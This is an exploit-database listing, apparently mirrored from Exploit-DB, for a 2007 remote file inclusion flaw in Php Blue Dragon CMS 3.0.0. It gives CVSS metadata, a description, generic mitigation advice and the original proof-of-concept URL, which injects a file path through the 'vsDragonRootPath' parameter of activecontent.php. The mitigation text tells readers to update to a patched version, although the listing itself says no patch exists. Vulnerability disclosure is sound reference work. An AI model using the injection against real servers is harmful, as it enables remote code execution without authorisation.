header-logo
Suggest Exploit
vendor:
Php Blue Dragon CMS
by:
Kacper
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Php Blue Dragon CMS
Affected Version From: Php Blue Dragon CMS version 3.0.0
Affected Version To: Php Blue Dragon CMS version 3.0.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability

This exploit allows an attacker to remotely include files in the Php Blue Dragon CMS version 3.0.0 by manipulating the 'vsDragonRootPath' parameter in the 'activecontent.php' file. By injecting malicious code into this parameter, an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Php Blue Dragon CMS or apply any relevant security patches provided by the vendor. Additionally, it is advised to implement proper input validation and sanitization techniques to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

// Exploit Name: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
//Script Homepage: http://phpbluedragon.pl/

// Autor: Kacper [kacper1964@yahoo.pl]
// Autor Homepage: devilteam.eu  |  kacper.bblog.pl

//Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na irc!
//Irc: irc.milw0rm.com:6667 #devilteam

//Elo

Vulnerability:


http://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?]

# milw0rm.com [2007-08-10]

Navigation

Suggest Exploit

Services By CQR